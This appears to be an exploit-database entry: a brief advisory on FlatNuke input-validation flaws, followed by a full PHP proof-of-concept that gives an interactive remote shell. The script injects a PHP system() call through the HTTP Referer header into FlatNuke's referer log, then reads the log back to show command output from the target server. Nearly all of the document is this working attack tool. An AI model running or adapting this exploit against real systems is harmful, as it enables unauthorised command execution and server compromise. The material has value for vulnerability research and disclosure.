194 lines
No EOL
6.7 KiB
PHP
194 lines
No EOL
6.7 KiB
PHP
source: https://www.securityfocus.com/bid/13882/info
|
|
|
|
Multiple input validation vulnerabilities reportedly affect FlatNuke. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it in application-critical actions such as generating Web content or loading scripts.
|
|
|
|
An attacker may leverage these issues to execute arbitrary PHP code, execute client-side script code in the browsers of unsuspecting users through cross-site scripting attacks, and gain access to sensitive information. Other attacks are also possible.
|
|
|
|
<?php
|
|
/*
|
|
|
|
Flatnuke 2.5.3 Arbitrary Remote Command Injection Shell PoC
|
|
|
|
Description: A simple PHP PoC script yielding a virtual remote shell
|
|
Advisory: http://secwatch.org/advisories/secwatch/20050604_flatnuke.txt
|
|
Original: http://secwatch.org/exploits/2005/06/flatnuke_shell.php.info
|
|
Fixed version: FlatNuke 2.5.3
|
|
Author: SW [at] secwatch [dot] co [dot] uk
|
|
|
|
References:
|
|
http://flatnuke.sourceforge.net/index.php?mod=read&id=1117979256
|
|
|
|
*/
|
|
|
|
|
|
/* start session */
|
|
session_start();
|
|
|
|
/* initialise session variables. */
|
|
if (empty($_SESSION['output']) || !empty($_POST['reset'])) {
|
|
$_SESSION['history'] = array();
|
|
$_SESSION['output'] = '';
|
|
$_SESSION['cmdcnt'] = 0;
|
|
$_SESSION['cwd'] = '/';
|
|
for($len=8,$r=''; strlen($r)<$len; $r.=chr(!mt_rand(0,2)? mt_rand(48,57):(!mt_rand(0,1)?mt_rand(65,90):mt_rand (97,122))));
|
|
$_SESSION['rand'] = $r; // rand string for this session only
|
|
}
|
|
|
|
if (!empty($_POST['CMD'])) {
|
|
if (get_magic_quotes_gpc()) {
|
|
$_POST['CMD'] = stripslashes($_POST['CMD']);
|
|
}
|
|
|
|
/* save current command in */
|
|
if (($i = array_search($_POST['CMD'], $_SESSION['history'])) !== false)
|
|
unset($_SESSION['history'][$i]);
|
|
|
|
array_unshift($_SESSION['history'], $_POST['CMD']);
|
|
$_SESSION['output'] .= '$ ' . $_POST['CMD'] . "\n";
|
|
}
|
|
|
|
/* initialise current directory. */
|
|
if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_POST['CMD'])) {
|
|
$_SESSION['cwd'] = dirname(__FILE__);
|
|
} else if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_POST['CMD'], $regs)) {
|
|
if ($regs[1][0] == '/') {
|
|
$new_dir = $regs[1]; /* absolute path */
|
|
} else {
|
|
$new_dir = $_SESSION['cwd'] . '/' . $regs[1];/* relative path */
|
|
}
|
|
while (strpos($new_dir, '/./') !== false) $new_dir = str_replace('/./', '/', $new_dir); /* transform '/./' into '/' */
|
|
while (strpos($new_dir, '//') !== false) $new_dir = str_replace('//', '/', $new_dir); /* transform '//' into '/' */
|
|
while (preg_match('|/\.\.(?!\.)|', $new_dir)) $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir); /* transform 'x/..' into '' */
|
|
$_SESSION['cwd'] = ($new_dir == '') ? "/" : $new_dir;
|
|
}
|
|
|
|
/* build the command history */
|
|
if (empty($_SESSION['history'])) {
|
|
$js_command_hist = '""';
|
|
} else {
|
|
$escaped = array_map('addslashes', $_SESSION['history']);
|
|
$js_command_hist = '"", "' . implode('", "', $escaped) . '"';
|
|
}
|
|
?>
|
|
|
|
<html>
|
|
<head>
|
|
<title>FlatNuke 2.5.3 Arbitrary Command Injection Shell PoC</title>
|
|
<script type="text/javascript" language="JavaScript">
|
|
var current_line = 0;
|
|
var command_hist = new Array(<?php echo $js_command_hist ?>);
|
|
var last = 0;
|
|
|
|
function key(e) {
|
|
if (!e) var e = window.event;
|
|
|
|
if (e.keyCode == 38 && current_line < command_hist.length-1) {
|
|
command_hist[current_line] = document.shell.CMD.value;
|
|
current_line++;
|
|
document.shell.CMD.value = command_hist[current_line];
|
|
}
|
|
|
|
if (e.keyCode == 40 && current_line > 0) {
|
|
command_hist[current_line] = document.shell.CMD.value;
|
|
current_line--;
|
|
document.shell.CMD.value = command_hist[current_line];
|
|
}
|
|
}
|
|
|
|
function init() {
|
|
document.shell.setAttribute("autocomplete", "off");
|
|
document.shell.output.scrollTop = document.shell.output.scrollHeight;
|
|
document.shell.CMD.focus();
|
|
}
|
|
</script>
|
|
<style>
|
|
textarea {
|
|
border: none;
|
|
width: 100%;
|
|
padding: 2px 2px 0px;
|
|
}
|
|
div {
|
|
border: inset 2px white;
|
|
}
|
|
p.prompt {
|
|
font-family: monospace;
|
|
margin: 0px;
|
|
padding: 0px 2px 2px;
|
|
}
|
|
input.prompt {
|
|
border: none;
|
|
font-family: monospace;
|
|
}
|
|
</style>
|
|
</head>
|
|
<body onload="init()">
|
|
<p align="center"><center><h2>FlatNuke 2.5.3 Arbitrary Command Injection Shell PoC</h2></center></p><br />
|
|
<form name="shell" method="POST" action="<? echo $_SERVER['PHP_SELF'] ?>">
|
|
<table>
|
|
<tr>
|
|
<td>Host+Path:</td>
|
|
<td><input type="text" name="URL" size="35" value="<? echo $_POST['URL'] ?>" /> (e.g http://site.com/path/to/flatnuke/ - note only path to flatnuke root directory)<br /></td>
|
|
<tr>
|
|
<tr>
|
|
<td>Directory:</td>
|
|
<td><?php echo $_SESSION['cwd']; ?></td>
|
|
<tr>
|
|
</table>
|
|
<div>
|
|
|
|
<?php
|
|
/* tidy up request / set some defaults if not provided */
|
|
$urlbits = parse_url($_POST['URL']);
|
|
$host = ($urlbits['host'] != "") ? $urlbits['host'] : "";
|
|
$port = ($urlbits['port'] != "") ? $urlbits['port'] : 80;
|
|
$path = ($urlbits['path'] != "") ? $urlbits['path'] : "/flatnuke/";
|
|
$quer = ($urlbits['query'] != "") ? "?".$urlbits['query'] : "";
|
|
$cmd = ($_POST['CMD'] != "") ? addslashes("cd {$_SESSION['cwd']} && ".$_POST['CMD']) : "";
|
|
$reflog = $path."misc/flatstat/referer.php";
|
|
$int = $_SESSION['cmdcnt']++;
|
|
$referer = "http://noneexistantsite.com/?s{$_SESSION['rand']}$int=<?php system(\"$cmd\")?>&e{$_SESSION['rand']}$int";
|
|
|
|
/* ensure all required vars are present */
|
|
if (isset($_POST['URL']) && $host != "" && $cmd != "") {
|
|
|
|
/* connect to target */
|
|
if (!$fp = fsockopen($host, $port, $errno, $errstr)) {
|
|
echo "Cound not connect to <i>$host</i> ($errstr - $errno)<br/>\n";
|
|
} else {
|
|
/* make HTTP request */
|
|
fputs($fp, "GET $path.$quer HTTP/1.1\r\n");
|
|
fputs($fp, "Host: $host\r\n");
|
|
fputs($fp, "Referer: $referer\r\n");
|
|
fputs($fp, "Connection: close\r\n\r\n");
|
|
fclose($fp);
|
|
usleep(150000);
|
|
|
|
/* retrieve command output */
|
|
if ($result = file_get_contents("http://$host:$port$reflog")) {
|
|
|
|
/* strip other irrelevant referer information */
|
|
$trim = str_replace("http://noneexistantsite.com/?s{$_SESSION['rand']}$int=", "", stristr($result, "http://noneexistantsite.com/?s{$_SESSION['rand']}$int="));
|
|
$trim = str_replace(stristr($trim, "&e{$_SESSION['rand']}$int"), "", $trim);
|
|
|
|
/* display trimmed command output */
|
|
$_SESSION['output'] .= htmlspecialchars($trim);
|
|
}
|
|
}
|
|
}
|
|
?>
|
|
|
|
<textarea name="output" readonly="readonly" cols="90" rows="30">
|
|
<?php
|
|
$lines = substr_count($_SESSION['output'], "\n");
|
|
$padding = str_repeat("\n", max(0, 36 - $lines));
|
|
echo rtrim($padding . $_SESSION['output']);
|
|
?>
|
|
</textarea>
|
|
<p class="prompt">
|
|
$ <input class="prompt" type="text" name="CMD" size="78" onkeyup="key(event)" tabindex="1" />
|
|
</p>
|
|
</div><br /><br />
|
|
<input type="submit" value="Execute" /> <input type="submit" name="reset" value="Reset" />
|
|
</form>
|
|
</body>
|
|
</html>
|